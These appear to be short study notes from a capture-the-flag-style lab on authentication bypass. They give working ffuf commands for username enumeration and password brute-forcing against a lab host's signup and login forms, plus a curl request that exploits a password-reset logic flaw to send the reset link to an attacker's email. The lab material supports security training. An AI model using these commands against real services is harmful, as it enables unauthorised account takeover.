Authentication Bypass

User Enumeration

  • Website error messages are great for collecting information

  • Entering the username admin and fill the other field with fake information, you'll get an error like An account with this username already exists

  • We can do this with ffuf

    • ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/signup -mr "username already exists"

Brute Force

  • Use the usernames found from enumeration to brute force

  • ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/login -fc 200

Logic Flaw

  • A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated

Logic Path
  • Example

    • curl 'http://10.10.214.198/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: applicatio-www-form-urlencoded' -d 'username=robert&[email protected]'

    • Using the Reset Password but sends the email to a different email which we are passing in the POST request

Last updated